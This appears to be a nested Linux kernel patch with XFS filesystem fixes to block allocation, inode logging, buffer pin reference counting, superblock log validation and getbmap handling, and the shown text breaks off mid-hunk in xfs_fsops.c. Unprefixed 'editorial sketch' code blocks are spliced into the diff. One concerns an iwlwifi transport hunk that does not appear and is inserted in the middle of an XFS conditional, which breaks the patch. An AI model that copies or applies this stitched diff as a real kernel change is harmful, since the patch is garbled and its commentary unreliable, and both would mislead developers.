+-		XFS_FSB_TO_AGNO(args->mp, args->fsbno));
+-
+ 	ap->blkno = args->fsbno;
+-	if (nullfb)
+-		ap->tp->t_firstblock = args->fsbno;
+ 	ap->length = args->len;
+ 	/*
+ 	 * If the extent size hint is active, we tried to round the
+@@ -4256,7 +4242,7 @@ xfs_bmapi_convert_unwritten(
+ 	return 0;
+ }
+ 
+-static inline xfs_extlen_t
++xfs_extlen_t
+ xfs_bmapi_minleft(
+ 	struct xfs_trans	*tp,
+ 	struct xfs_inode	*ip,
+diff --git a/fs/xfs/libxfs/xfs_bmap.h b/fs/xfs/libxfs/xfs_bmap.h
+index 16db95b115891c..08c16e4edc0f52 100644
+--- a/fs/xfs/libxfs/xfs_bmap.h
++++ b/fs/xfs/libxfs/xfs_bmap.h
+@@ -220,6 +220,8 @@ int	xfs_bmap_add_extent_unwritten_real(struct xfs_trans *tp,
+ 		struct xfs_inode *ip, int whichfork,
+ 		struct xfs_iext_cursor *icur, struct xfs_btree_cur **curp,
+ 		struct xfs_bmbt_irec *new, int *logflagsp);
++xfs_extlen_t xfs_bmapi_minleft(struct xfs_trans *tp, struct xfs_inode *ip,
++		int fork);
+ 
+ enum xfs_bmap_intent_type {
+ 	XFS_BMAP_MAP = 1,
+diff --git a/fs/xfs/libxfs/xfs_bmap_btree.c b/fs/xfs/libxfs/xfs_bmap_btree.c
+index cfa052d40105dc..18de4fbfef4e9b 100644
+--- a/fs/xfs/libxfs/xfs_bmap_btree.c
++++ b/fs/xfs/libxfs/xfs_bmap_btree.c
+@@ -213,18 +213,16 @@ xfs_bmbt_alloc_block(
+ 	if (args.fsbno == NULLFSBLOCK) {
+ 		args.fsbno = be64_to_cpu(start->l);
+ 		args.type = XFS_ALLOCTYPE_START_BNO;
++
+ 		/*
+-		 * Make sure there is sufficient room left in the AG to
+-		 * complete a full tree split for an extent insert.  If
+-		 * we are converting the middle part of an extent then
+-		 * we may need space for two tree splits.
+-		 *
+-		 * We are relying on the caller to make the correct block
+-		 * reservation for this operation to succeed.  If the
+-		 * reservation amount is insufficient then we may fail a
+-		 * block allocation here and corrupt the filesystem.
++		 * If we are coming here from something like unwritten extent
++		 * conversion, there has been no data extent allocation already
++		 * done, so we have to ensure that we attempt to locate the
++		 * entire set of bmbt allocations in the same AG, as
++		 * xfs_bmapi_write() would have reserved.
+ 		 */
+-		args.minleft = args.tp->t_blk_res;
++		args.minleft = xfs_bmapi_minleft(cur->bc_tp, cur->bc_ino.ip,
++						cur->bc_ino.whichfork);
+ 	} else if (cur->bc_tp->t_flags & XFS_TRANS_LOWMODE) {
+ 		args.type = XFS_ALLOCTYPE_START_BNO;
+ 	} else {
+@@ -248,6 +246,7 @@ xfs_bmbt_alloc_block(
+ 		 * successful activate the lowspace algorithm.
+ 		 */
+ 		args.fsbno = 0;
++		args.minleft = 0;
+ 		args.type = XFS_ALLOCTYPE_FIRST_AG;
+ 		error = xfs_alloc_vextent(&args);
+ 		if (error)
+diff --git a/fs/xfs/libxfs/xfs_btree.c b/fs/xfs/libxfs/xfs_btree.c
+index 4c16c8c31fcbcd..6b084b3cac83eb 100644
+--- a/fs/xfs/libxfs/xfs_btree.c
++++ b/fs/xfs/libxfs/xfs_btree.c
+@@ -2913,9 +2913,22 @@ xfs_btree_split_worker(
+ }
+ 
+ /*
+- * BMBT split requests often come in with little stack to work on. Push
++ * BMBT split requests often come in with little stack to work on so we push
+  * them off to a worker thread so there is lots of stack to use. For the other
+  * btree types, just call directly to avoid the context switch overhead here.
++ *
++ * Care must be taken here - the work queue rescuer thread introduces potential
++ * AGF <> worker queue deadlocks if the BMBT block allocation has to lock new
++ * AGFs to allocate blocks. A task being run by the rescuer could attempt to
++ * lock an AGF that is already locked by a task queued to run by the rescuer,
++ * resulting in an ABBA deadlock as the rescuer cannot run the lock holder to
++ * release it until the current thread it is running gains the lock.
++ *
++ * To avoid this issue, we only ever queue BMBT splits that don't have an AGF
++ * already locked to allocate from. The only place that doesn't hold an AGF
++ * locked is unwritten extent conversion at IO completion, but that has already
++ * been offloaded to a worker thread and hence has no stack consumption issues
++ * we have to worry about.
+  */
+ STATIC int					/* error */
+ xfs_btree_split(
+@@ -2929,7 +2942,8 @@ xfs_btree_split(
+ 	struct xfs_btree_split_args	args;
+ 	DECLARE_COMPLETION_ONSTACK(done);
+ 
+-	if (cur->bc_btnum != XFS_BTNUM_BMAP)
++	if (cur->bc_btnum != XFS_BTNUM_BMAP ||
++	    cur->bc_tp->t_firstblock == NULLFSBLOCK)
+ 		return __xfs_btree_split(cur, level, ptrp, key, curp, stat);
+ 
+ 	args.cur = cur;
+diff --git a/fs/xfs/libxfs/xfs_fs.h b/fs/xfs/libxfs/xfs_fs.h
+index 1cfd5bc6520a22..9c60ebb328b489 100644
+--- a/fs/xfs/libxfs/xfs_fs.h
++++ b/fs/xfs/libxfs/xfs_fs.h
+@@ -257,6 +257,8 @@ typedef struct xfs_fsop_resblks {
+ #define XFS_MAX_AG_BLOCKS	(XFS_MAX_AG_BYTES / XFS_MIN_BLOCKSIZE)
+ #define XFS_MAX_CRC_AG_BLOCKS	(XFS_MAX_AG_BYTES / XFS_MIN_CRC_BLOCKSIZE)
+ 
++#define XFS_MAX_AGNUMBER	((xfs_agnumber_t)(NULLAGNUMBER - 1))
++
+ /* keep the maximum size under 2^31 by a small amount */
+ #define XFS_MAX_LOG_BYTES \
+ 	((2 * 1024 * 1024 * 1024ULL) - XFS_MIN_LOG_BYTES)
+diff --git a/fs/xfs/libxfs/xfs_ialloc.c b/fs/xfs/libxfs/xfs_ialloc.c
+index 94db50eb706ac5..120dbec16f5ca8 100644
+--- a/fs/xfs/libxfs/xfs_ialloc.c
++++ b/fs/xfs/libxfs/xfs_ialloc.c
+@@ -1737,6 +1737,7 @@ xfs_dialloc(
+ 	struct xfs_perag	*pag;
+ 	struct xfs_ino_geometry	*igeo = M_IGEO(mp);
+ 	bool			ok_alloc = true;
++	bool			low_space = false;
+ 	int			flags;
+ 	xfs_ino_t		ino;
+ 
+@@ -1767,6 +1768,20 @@ xfs_dialloc(
+ 		ok_alloc = false;
+ 	}
+ 
++	/*
++	 * If we are near to ENOSPC, we want to prefer allocation from AGs that
++	 * have free inodes in them rather than use up free space allocating new
++	 * inode chunks. Hence we turn off allocation for the first non-blocking
++	 * pass through the AGs if we are near ENOSPC to consume free inodes
++	 * that we can immediately allocate, but then we allow allocation on the
++	 * second pass if we fail to find an AG with free inodes in it.
++	 */
++	if (percpu_counter_read_positive(&mp->m_fdblocks) <
++			mp->m_low_space[XFS_LOWSP_1_PCNT]) {
++		ok_alloc = false;
++		low_space = true;
++	}
++
+ 	/*
+ 	 * Loop until we find an allocation group that either has free inodes
+ 	 * or in which we can allocate some inodes.  Iterate through the
+@@ -1795,6 +1810,8 @@ xfs_dialloc(
+ 				break;
+ 			}
+ 			flags = 0;
++			if (low_space)
++				ok_alloc = true;
+ 		}
+ 		xfs_perag_put(pag);
+ 	}
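/*
 * (Editorial sketch.) The near-ENOSPC condition the ialloc hunk adds,
 * extracted into an invented helper: below the 1% low-space threshold the
 * first pass over the AGs only consumes existing free inodes, and chunk
 * allocation is re-enabled for the second, blocking pass.
 */
static bool demo_near_enospc(struct xfs_mount *mp)
{
	return percpu_counter_read_positive(&mp->m_fdblocks) <
	       mp->m_low_space[XFS_LOWSP_1_PCNT];
}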
+diff --git a/fs/xfs/libxfs/xfs_log_format.h b/fs/xfs/libxfs/xfs_log_format.h
+index f13e0809dc63f2..269573c828085f 100644
+--- a/fs/xfs/libxfs/xfs_log_format.h
++++ b/fs/xfs/libxfs/xfs_log_format.h
+@@ -324,7 +324,6 @@ struct xfs_inode_log_format_32 {
+ #define XFS_ILOG_DOWNER	0x200	/* change the data fork owner on replay */
+ #define XFS_ILOG_AOWNER	0x400	/* change the attr fork owner on replay */
+ 
+-
+ /*
+  * The timestamps are dirty, but not necessarily anything else in the inode
+  * core.  Unlike the other fields above this one must never make it to disk
+@@ -333,6 +332,14 @@ struct xfs_inode_log_format_32 {
+  */
+ #define XFS_ILOG_TIMESTAMP	0x4000
+ 
++/*
++ * The version field has been changed, but not necessarily anything else of
++ * interest. This must never make it to disk - it is used purely to ensure that
++ * the inode item ->precommit operation can update the fsync flag triggers
++ * in the inode item correctly.
++ */
++#define XFS_ILOG_IVERSION	0x8000
++
+ #define	XFS_ILOG_NONCORE	(XFS_ILOG_DDATA | XFS_ILOG_DEXT | \
+ 				 XFS_ILOG_DBROOT | XFS_ILOG_DEV | \
+ 				 XFS_ILOG_ADATA | XFS_ILOG_AEXT | \
+diff --git a/fs/xfs/libxfs/xfs_sb.c b/fs/xfs/libxfs/xfs_sb.c
+index bf2cca78304eb9..c24a38272cb7c8 100644
+--- a/fs/xfs/libxfs/xfs_sb.c
++++ b/fs/xfs/libxfs/xfs_sb.c
+@@ -413,7 +413,6 @@ xfs_validate_sb_common(
+ 	    sbp->sb_inodelog < XFS_DINODE_MIN_LOG			||
+ 	    sbp->sb_inodelog > XFS_DINODE_MAX_LOG			||
+ 	    sbp->sb_inodesize != (1 << sbp->sb_inodelog)		||
+-	    sbp->sb_logsunit > XLOG_MAX_RECORD_BSIZE			||
+ 	    sbp->sb_inopblock != howmany(sbp->sb_blocksize,sbp->sb_inodesize) ||
+ 	    XFS_FSB_TO_B(mp, sbp->sb_agblocks) < XFS_MIN_AG_BYTES	||
+ 	    XFS_FSB_TO_B(mp, sbp->sb_agblocks) > XFS_MAX_AG_BYTES	||
+@@ -431,6 +430,61 @@ xfs_validate_sb_common(
+ 		return -EFSCORRUPTED;
+ 	}
+ 
++	/*
++	 * Logs that are too large are not supported at all. Reject them
++	 * outright. Logs that are too small are tolerated on v4 filesystems,
++	 * but we can only check that when mounting the log. Hence we skip
++	 * those checks here.
++	 */
++	if (sbp->sb_logblocks > XFS_MAX_LOG_BLOCKS) {
++		xfs_notice(mp,
++		"Log size 0x%x blocks too large, maximum size is 0x%llx blocks",
++			 sbp->sb_logblocks, XFS_MAX_LOG_BLOCKS);
++		return -EFSCORRUPTED;
++	}
++
++	if (XFS_FSB_TO_B(mp, sbp->sb_logblocks) > XFS_MAX_LOG_BYTES) {
++		xfs_warn(mp,
++		"log size 0x%llx bytes too large, maximum size is 0x%llx bytes",
++			 XFS_FSB_TO_B(mp, sbp->sb_logblocks),
++			 XFS_MAX_LOG_BYTES);
++		return -EFSCORRUPTED;
++	}
++
++	/*
++	 * Do not allow filesystems with corrupted log sector or stripe units to
++	 * be mounted. We cannot safely size the iclogs or write to the log if
++	 * the log stripe unit is not valid.
++	 */
++	if (sbp->sb_versionnum & XFS_SB_VERSION_SECTORBIT) {
++		if (sbp->sb_logsectsize != (1U << sbp->sb_logsectlog)) {
++			xfs_notice(mp,
++			"log sector size in bytes/log2 (0x%x/0x%x) must match",
++				sbp->sb_logsectsize, 1U << sbp->sb_logsectlog);
++			return -EFSCORRUPTED;
++		}
++	} else if (sbp->sb_logsectsize || sbp->sb_logsectlog) {
++		xfs_notice(mp,
++		"log sector size in bytes/log2 (0x%x/0x%x) are not zero",
++			sbp->sb_logsectsize, sbp->sb_logsectlog);
++		return -EFSCORRUPTED;
++	}
++
++	if (sbp->sb_logsunit > 1) {
++		if (sbp->sb_logsunit % sbp->sb_blocksize) {
++			xfs_notice(mp,
++		"log stripe unit 0x%x bytes must be a multiple of block size",
++				sbp->sb_logsunit);
++			return -EFSCORRUPTED;
++		}
++		if (sbp->sb_logsunit > XLOG_MAX_RECORD_BSIZE) {
++			xfs_notice(mp,
++		"log stripe unit 0x%x bytes over maximum size (0x%x bytes)",
++				sbp->sb_logsunit, XLOG_MAX_RECORD_BSIZE);
++			return -EFSCORRUPTED;
++		}
++	}
++
+ 	/* Validate the realtime geometry; stolen from xfs_repair */
+ 	if (sbp->sb_rextsize * sbp->sb_blocksize > XFS_MAX_RTEXTSIZE ||
+ 	    sbp->sb_rextsize * sbp->sb_blocksize < XFS_MIN_RTEXTSIZE) {
+diff --git a/fs/xfs/libxfs/xfs_trans_inode.c b/fs/xfs/libxfs/xfs_trans_inode.c
+index 8b55470733791d..cb4796b6e693ae 100644
+--- a/fs/xfs/libxfs/xfs_trans_inode.c
++++ b/fs/xfs/libxfs/xfs_trans_inode.c
+@@ -40,9 +40,8 @@ xfs_trans_ijoin(
+ 	iip->ili_lock_flags = lock_flags;
+ 	ASSERT(!xfs_iflags_test(ip, XFS_ISTALE));
+ 
+-	/*
+-	 * Get a log_item_desc to point at the new item.
+-	 */
++	/* Reset the per-tx dirty context and add the item to the tx. */
++	iip->ili_dirty_flags = 0;
+ 	xfs_trans_add_item(tp, &iip->ili_item);
+ }
+ 
+@@ -76,17 +75,10 @@ xfs_trans_ichgtime(
+ /*
+  * This is called to mark the fields indicated in fieldmask as needing to be
+  * logged when the transaction is committed.  The inode must already be
+- * associated with the given transaction.
+- *
+- * The values for fieldmask are defined in xfs_inode_item.h.  We always log all
+- * of the core inode if any of it has changed, and we always log all of the
+- * inline data/extents/b-tree root if any of them has changed.
+- *
+- * Grab and pin the cluster buffer associated with this inode to avoid RMW
+- * cycles at inode writeback time. Avoid the need to add error handling to every
+- * xfs_trans_log_inode() call by shutting down on read error.  This will cause
+- * transactions to fail and everything to error out, just like if we return a
+- * read error in a dirty transaction and cancel it.
++ * associated with the given transaction. All we do here is record where the
++ * inode was dirtied and mark the transaction and inode log item dirty;
++ * everything else is done in the ->precommit log item operation after the
++ * changes in the transaction have been completed.
+  */
+ void
+ xfs_trans_log_inode(
+@@ -96,7 +88,6 @@ xfs_trans_log_inode(
+ {
+ 	struct xfs_inode_log_item *iip = ip->i_itemp;
+ 	struct inode		*inode = VFS_I(ip);
+-	uint			iversion_flags = 0;
+ 
+ 	ASSERT(iip);
+ 	ASSERT(xfs_isilocked(ip, XFS_ILOCK_EXCL));
+@@ -104,18 +95,6 @@ xfs_trans_log_inode(
+ 
+ 	tp->t_flags |= XFS_TRANS_DIRTY;
+ 
+-	/*
+-	 * Don't bother with i_lock for the I_DIRTY_TIME check here, as races
+-	 * don't matter - we either will need an extra transaction in 24 hours
+-	 * to log the timestamps, or will clear already cleared fields in the
+-	 * worst case.
+-	 */
+-	if (inode->i_state & I_DIRTY_TIME) {
+-		spin_lock(&inode->i_lock);
+-		inode->i_state &= ~I_DIRTY_TIME;
+-		spin_unlock(&inode->i_lock);
+-	}
+-
+ 	/*
+ 	 * First time we log the inode in a transaction, bump the inode change
+ 	 * counter if it is configured for this to occur. While we have the
+@@ -128,86 +107,10 @@ xfs_trans_log_inode(
+ 	if (!test_and_set_bit(XFS_LI_DIRTY, &iip->ili_item.li_flags)) {
+ 		if (IS_I_VERSION(inode) &&
+ 		    inode_maybe_inc_iversion(inode, flags & XFS_ILOG_CORE))
+-			iversion_flags = XFS_ILOG_CORE;
+-	}
+-
+-	/*
+-	 * If we're updating the inode core or the timestamps and it's possible
+-	 * to upgrade this inode to bigtime format, do so now.
+-	 */
+-	if ((flags & (XFS_ILOG_CORE | XFS_ILOG_TIMESTAMP)) &&
+-	    xfs_has_bigtime(ip->i_mount) &&
+-	    !xfs_inode_has_bigtime(ip)) {
+-		ip->i_diflags2 |= XFS_DIFLAG2_BIGTIME;
+-		flags |= XFS_ILOG_CORE;
+-	}
+-
+-	/*
+-	 * Inode verifiers do not check that the extent size hint is an integer
+-	 * multiple of the rt extent size on a directory with both rtinherit
+-	 * and extszinherit flags set.  If we're logging a directory that is
+-	 * misconfigured in this way, clear the hint.
+-	 */
+-	if ((ip->i_diflags & XFS_DIFLAG_RTINHERIT) &&
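/*
 * (Editorial sketch.) The iwl-trans hunk above swaps two lines so that the
 * transport state is updated before the op-mode error handler runs. With
 * invented names, the ordering rule is "publish the dead state, then
 * notify", so anything the handler triggers already sees the new state:
 */
enum demo_state { DEMO_TRANS_FW_ALIVE, DEMO_TRANS_NO_FW };
struct demo_trans { enum demo_state state; };

static void demo_op_mode_nic_error(struct demo_trans *trans, bool sync)
{
	/* error handling that must observe trans->state == DEMO_TRANS_NO_FW */
}

static void demo_report_fw_error(struct demo_trans *trans, bool sync)
{
	trans->state = DEMO_TRANS_NO_FW;	/* visible to the handler... */
	demo_op_mode_nic_error(trans, sync);	/* ...before it runs */
}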
+-	    (ip->i_diflags & XFS_DIFLAG_EXTSZINHERIT) &&
+-	    (ip->i_extsize % ip->i_mount->m_sb.sb_rextsize) > 0) {
+-		ip->i_diflags &= ~(XFS_DIFLAG_EXTSIZE |
+-				   XFS_DIFLAG_EXTSZINHERIT);
+-		ip->i_extsize = 0;
+-		flags |= XFS_ILOG_CORE;
++			flags |= XFS_ILOG_IVERSION;
+ 	}
+ 
+-	/*
+-	 * Record the specific change for fdatasync optimisation. This allows
+-	 * fdatasync to skip log forces for inodes that are only timestamp
+-	 * dirty.
+-	 */
+-	spin_lock(&iip->ili_lock);
+-	iip->ili_fsync_fields |= flags;
+-
+-	if (!iip->ili_item.li_buf) {
+-		struct xfs_buf	*bp;
+-		int		error;
+-
+-		/*
+-		 * We hold the ILOCK here, so this inode is not going to be
+-		 * flushed while we are here. Further, because there is no
+-		 * buffer attached to the item, we know that there is no IO in
+-		 * progress, so nothing will clear the ili_fields while we read
+-		 * in the buffer. Hence we can safely drop the spin lock and
+-		 * read the buffer knowing that the state will not change from
+-		 * here.
+-		 */
+-		spin_unlock(&iip->ili_lock);
+-		error = xfs_imap_to_bp(ip->i_mount, tp, &ip->i_imap, &bp);
+-		if (error) {
+-			xfs_force_shutdown(ip->i_mount, SHUTDOWN_META_IO_ERROR);
+-			return;
+-		}
+-
+-		/*
+-		 * We need an explicit buffer reference for the log item but
+-		 * don't want the buffer to remain attached to the transaction.
+-		 * Hold the buffer but release the transaction reference once
+-		 * we've attached the inode log item to the buffer log item
+-		 * list.
+-		 */
+-		xfs_buf_hold(bp);
+-		spin_lock(&iip->ili_lock);
+-		iip->ili_item.li_buf = bp;
+-		bp->b_flags |= _XBF_INODES;
+-		list_add_tail(&iip->ili_item.li_bio_list, &bp->b_li_list);
+-		xfs_trans_brelse(tp, bp);
+-	}
+-
+-	/*
+-	 * Always OR in the bits from the ili_last_fields field.  This is to
+-	 * coordinate with the xfs_iflush() and xfs_buf_inode_iodone() routines
+-	 * in the eventual clearing of the ili_fields bits.  See the big comment
+-	 * in xfs_iflush() for an explanation of this coordination mechanism.
+-	 */
+-	iip->ili_fields |= (flags | iip->ili_last_fields | iversion_flags);
+-	spin_unlock(&iip->ili_lock);
++	iip->ili_dirty_flags |= flags;
+ }
+ 
+ int
+diff --git a/fs/xfs/xfs_attr_inactive.c b/fs/xfs/xfs_attr_inactive.c
+index 5db87b34fb6e20..89c7a9f4f93054 100644
+--- a/fs/xfs/xfs_attr_inactive.c
++++ b/fs/xfs/xfs_attr_inactive.c
+@@ -333,7 +333,6 @@ xfs_attr_inactive(
+ 	int			error = 0;
+ 
+ 	mp = dp->i_mount;
+-	ASSERT(! XFS_NOT_DQATTACHED(mp, dp));
+ 
+ 	xfs_ilock(dp, lock_mode);
+ 	if (!xfs_inode_has_attr_fork(dp))
+diff --git a/fs/xfs/xfs_bmap_util.c b/fs/xfs/xfs_bmap_util.c
+index 867645b74d889d..ce8e17ab543466 100644
+--- a/fs/xfs/xfs_bmap_util.c
++++ b/fs/xfs/xfs_bmap_util.c
+@@ -314,15 +314,13 @@ xfs_getbmap_report_one(
+ 	if (isnullstartblock(got->br_startblock) ||
+ 	    got->br_startblock == DELAYSTARTBLOCK) {
+ 		/*
+-		 * Delalloc extents that start beyond EOF can occur due to
+-		 * speculative EOF allocation when the delalloc extent is larger
+-		 * than the largest freespace extent at conversion time.  These
+-		 * extents cannot be converted by data writeback, so can exist
+-		 * here even if we are not supposed to be finding delalloc
+-		 * extents.
++		 * Take the flush completion as being a point-in-time snapshot
++		 * where there are no delalloc extents, and if any new ones
++		 * have been created racily, just skip them as being 'after'
++		 * the flush and so don't get reported.
+ 		 */
+-		if (got->br_startoff < XFS_B_TO_FSB(ip->i_mount, XFS_ISIZE(ip)))
+-			ASSERT((bmv->bmv_iflags & BMV_IF_DELALLOC) != 0);
++		if (!(bmv->bmv_iflags & BMV_IF_DELALLOC))
++			return 0;
+ 
+ 		p->bmv_oflags |= BMV_OF_DELALLOC;
+ 		p->bmv_block = -2;
+@@ -560,7 +558,9 @@ xfs_getbmap(
+ 		if (!xfs_iext_next_extent(ifp, &icur, &got)) {
+ 			xfs_fileoff_t	end = XFS_B_TO_FSB(mp, XFS_ISIZE(ip));
+ 
+-			out[bmv->bmv_entries - 1].bmv_oflags |= BMV_OF_LAST;
++			if (bmv->bmv_entries > 0)
++				out[bmv->bmv_entries - 1].bmv_oflags |=
++								BMV_OF_LAST;
+ 
+ 			if (whichfork != XFS_ATTR_FORK && bno < end &&
+ 			    !xfs_getbmap_full(bmv)) {
+diff --git a/fs/xfs/xfs_buf_item.c b/fs/xfs/xfs_buf_item.c
+index df7322ed73fa92..023d4e0385dd08 100644
+--- a/fs/xfs/xfs_buf_item.c
++++ b/fs/xfs/xfs_buf_item.c
+@@ -452,10 +452,18 @@ xfs_buf_item_format(
+  * This is called to pin the buffer associated with the buf log item in memory
+  * so it cannot be written out.
+  *
+- * We also always take a reference to the buffer log item here so that the bli
+- * is held while the item is pinned in memory. This means that we can
+- * unconditionally drop the reference count a transaction holds when the
+- * transaction is completed.
++ * We take a reference to the buffer log item here so that the BLI life cycle
++ * extends at least until the buffer is unpinned via xfs_buf_item_unpin() and
++ * inserted into the AIL.
++ *
++ * We also need to take a reference to the buffer itself as the BLI unpin
++ * processing requires accessing the buffer after the BLI has dropped the final
++ * BLI reference. See xfs_buf_item_unpin() for an explanation. If unpins
++ * race to drop the final BLI reference and only the BLI owns a reference
++ * to the buffer, then the loser of the race can have the buffer freed
++ * from under it (e.g. on shutdown). Taking a buffer reference per pin
++ * count ensures the life cycle of the buffer extends for as long as we
++ * hold the buffer pin reference in xfs_buf_item_unpin().
+  */
+ STATIC void
+ xfs_buf_item_pin(
+@@ -470,13 +478,30 @@ xfs_buf_item_pin(
+ 
+ 	trace_xfs_buf_item_pin(bip);
+ 
++	xfs_buf_hold(bip->bli_buf);
+ 	atomic_inc(&bip->bli_refcount);
+ 	atomic_inc(&bip->bli_buf->b_pin_count);
+ }
+ 
+ /*
+- * This is called to unpin the buffer associated with the buf log item which
+- * was previously pinned with a call to xfs_buf_item_pin().
++ * This is called to unpin the buffer associated with the buf log item which was
++ * previously pinned with a call to xfs_buf_item_pin().  We enter this function
++ * with a buffer pin count, a buffer reference and a BLI reference.
++ *
++ * We must drop the BLI reference before we unpin the buffer because the AIL
++ * doesn't acquire a BLI reference whenever it accesses it. Therefore if the
++ * refcount drops to zero, the bli could still be AIL resident and the buffer
++ * submitted for I/O at any point before we return. This can result in IO
++ * completion freeing the buffer while we are still trying to access it here.
++ * This race condition can also occur in shutdown situations where we abort and
++ * unpin buffers from contexts other than journal IO completion.
++ *
++ * Hence we have to hold a buffer reference per pin count to ensure that the
++ * buffer cannot be freed until we have finished processing the unpin operation.
++ * The reference is taken in xfs_buf_item_pin(), and we must hold it until we
++ * are done processing the buffer state. In the case of an abort (remove =
++ * true), we re-use the current pin reference as the IO reference we hand
++ * off to IO failure handling.
+  */
+ STATIC void
+ xfs_buf_item_unpin(
+@@ -493,24 +518,18 @@ xfs_buf_item_unpin(
+ 
+ 	trace_xfs_buf_item_unpin(bip);
+ 
+-	/*
+-	 * Drop the bli ref associated with the pin and grab the hold required
+-	 * for the I/O simulation failure in the abort case. We have to do this
+-	 * before the pin count drops because the AIL doesn't acquire a bli
+-	 * reference. Therefore if the refcount drops to zero, the bli could
+-	 * still be AIL resident and the buffer submitted for I/O (and freed on
+-	 * completion) at any point before we return. This can be removed once
+-	 * the AIL properly holds a reference on the bli.
+-	 */
+ 	freed = atomic_dec_and_test(&bip->bli_refcount);
+-	if (freed && !stale && remove)
+-		xfs_buf_hold(bp);
+ 	if (atomic_dec_and_test(&bp->b_pin_count))
+ 		wake_up_all(&bp->b_waiters);
+ 
+-	 /* nothing to do but drop the pin count if the bli is active */
+-	if (!freed)
++	/*
++	 * Nothing to do but drop the buffer pin reference if the BLI is
++	 * still active.
++	 */
++	if (!freed) {
++		xfs_buf_rele(bp);
+ 		return;
++	}
+ 
+ 	if (stale) {
+ 		ASSERT(bip->bli_flags & XFS_BLI_STALE);
+@@ -522,6 +541,15 @@ xfs_buf_item_unpin(
+ 
+ 		trace_xfs_buf_item_unpin_stale(bip);
+ 
++		/*
++		 * The buffer has been locked and referenced since it was marked
++		 * stale so we own both lock and reference exclusively here. We
++		 * do not need the pin reference any more, so drop it now so
++		 * that we only have one reference to drop once item completion
++		 * processing is complete.
++		 */
++		xfs_buf_rele(bp);
++
+ 		/*
+ 		 * If we get called here because of an IO error, we may or may
+ 		 * not have the item on the AIL. xfs_trans_ail_delete() will
+@@ -538,16 +566,30 @@ xfs_buf_item_unpin(
+ 			ASSERT(bp->b_log_item == NULL);
+ 		}
+ 		xfs_buf_relse(bp);
+-	} else if (remove) {
++		return;
++	}
++
++	if (remove) {
+ 		/*
+-		 * The buffer must be locked and held by the caller to simulate
+-		 * an async I/O failure. We acquired the hold for this case
+-		 * before the buffer was unpinned.
++		 * We need to simulate an async IO failure here to ensure that
++		 * the correct error completion is run on this buffer. This
++		 * requires a reference to the buffer and for the buffer to be
++		 * locked. We can safely pass ownership of the pin reference to
++		 * the IO to ensure that nothing can free the buffer while we
++		 * wait for the lock and then run the IO failure completion.
+ 		 */
+ 		xfs_buf_lock(bp);
+ 		bp->b_flags |= XBF_ASYNC;
+ 		xfs_buf_ioend_fail(bp);
++		return;
+ 	}
++
++	/*
++	 * BLI has no more active references - it will be moved to the AIL to
++	 * manage the remaining BLI/buffer life cycle. There is nothing left for
++	 * us to do here so drop the pin reference to the buffer.
++	 */
++	xfs_buf_rele(bp);
+ }
+ 
+ STATIC uint
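/*
 * (Editorial sketch.) The buf-item hunks above adopt a reference-per-pin
 * rule: each pin takes its own hold on the buffer, and each unpin path
 * ends by dropping exactly one, so the buffer cannot be freed while an
 * unpin is still executing. With invented names; demo_hold()/demo_rele()
 * stand in for xfs_buf_hold()/xfs_buf_rele().
 */
#include <linux/atomic.h>
#include <linux/wait.h>

struct demo_obj {
	atomic_t		pin_count;
	wait_queue_head_t	waiters;
};

void demo_hold(struct demo_obj *obj);	/* stand-in for xfs_buf_hold() */
void demo_rele(struct demo_obj *obj);	/* stand-in for xfs_buf_rele() */

static void demo_pin(struct demo_obj *obj)
{
	demo_hold(obj);			/* one reference per pin */
	atomic_inc(&obj->pin_count);
}

static void demo_unpin(struct demo_obj *obj)
{
	if (atomic_dec_and_test(&obj->pin_count))
		wake_up_all(&obj->waiters);
	demo_rele(obj);			/* drop this pin's reference last */
}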
+diff --git a/fs/xfs/xfs_dquot.c b/fs/xfs/xfs_dquot.c
+index 8fb90da89787c6..7f071757f27857 100644
+--- a/fs/xfs/xfs_dquot.c
++++ b/fs/xfs/xfs_dquot.c
+@@ -798,7 +798,6 @@ xfs_qm_dqget_cache_insert(
+ 	error = radix_tree_insert(tree, id, dqp);
+ 	if (unlikely(error)) {
+ 		/* Duplicate found!  Caller must try again. */
+-		WARN_ON(error != -EEXIST);
+ 		mutex_unlock(&qi->qi_tree_lock);
+ 		trace_xfs_dqget_dup(dqp);
+ 		return error;
+diff --git a/fs/xfs/xfs_export.c b/fs/xfs/xfs_export.c
+index 1064c234287680..7cd09c3a82cb50 100644
+--- a/fs/xfs/xfs_export.c
++++ b/fs/xfs/xfs_export.c
+@@ -146,6 +146,20 @@ xfs_nfs_get_inode(
+ 		return ERR_PTR(error);
+ 	}
+ 
++	/*
++	 * Reload the incore unlinked list to avoid failure in inodegc.
++	 * Use an unlocked check here because unrecovered unlinked inodes
++	 * should be somewhat rare.
++	 */
++	if (xfs_inode_unlinked_incomplete(ip)) {
++		error = xfs_inode_reload_unlinked(ip);
++		if (error) {
++			xfs_force_shutdown(mp, SHUTDOWN_CORRUPT_INCORE);
++			xfs_irele(ip);
++			return ERR_PTR(error);
++		}
++	}
++
+ 	if (VFS_I(ip)->i_generation != generation) {
+ 		xfs_irele(ip);
+ 		return ERR_PTR(-ESTALE);
+diff --git a/fs/xfs/xfs_extent_busy.c b/fs/xfs/xfs_extent_busy.c
+index ad22a003f9595c..f3d328e4a4408b 100644
+--- a/fs/xfs/xfs_extent_busy.c
++++ b/fs/xfs/xfs_extent_busy.c
+@@ -236,6 +236,7 @@ xfs_extent_busy_update_extent(
+ 		 *
+ 		 */
+ 		busyp->bno = fend;
++		busyp->length = bend - fend;
+ 	} else if (bbno < fbno) {
+ 		/*
+ 		 * Case 8:
+diff --git a/fs/xfs/xfs_fsmap.c b/fs/xfs/xfs_fsmap.c
+index d8337274c74d09..062e5dc5db9f33 100644
+--- a/fs/xfs/xfs_fsmap.c
++++ b/fs/xfs/xfs_fsmap.c
+@@ -761,6 +761,7 @@ xfs_getfsmap_datadev_bnobt(
+ {
+ 	struct xfs_alloc_rec_incore	akeys[2];
+ 
++	memset(akeys, 0, sizeof(akeys));
+ 	info->missing_owner = XFS_FMR_OWN_UNKNOWN;
+ 	return __xfs_getfsmap_datadev(tp, keys, info,
+ 			xfs_getfsmap_datadev_bnobt_query, &akeys[0]);
+diff --git a/fs/xfs/xfs_fsops.c b/fs/xfs/xfs_fsops.c
+index 332da0d7b85cfa..77b14f78821421 100644
+--- a/fs/xfs/xfs_fsops.c
++++ b/fs/xfs/xfs_fsops.c
+@@ -115,11 +115,16 @@ xfs_growfs_data_private(
+ 
+ 	nb_div = nb;
+ 	nb_mod = do_div(nb_div, mp->m_sb.sb_agblocks);
+-	nagcount = nb_div + (nb_mod != 0);
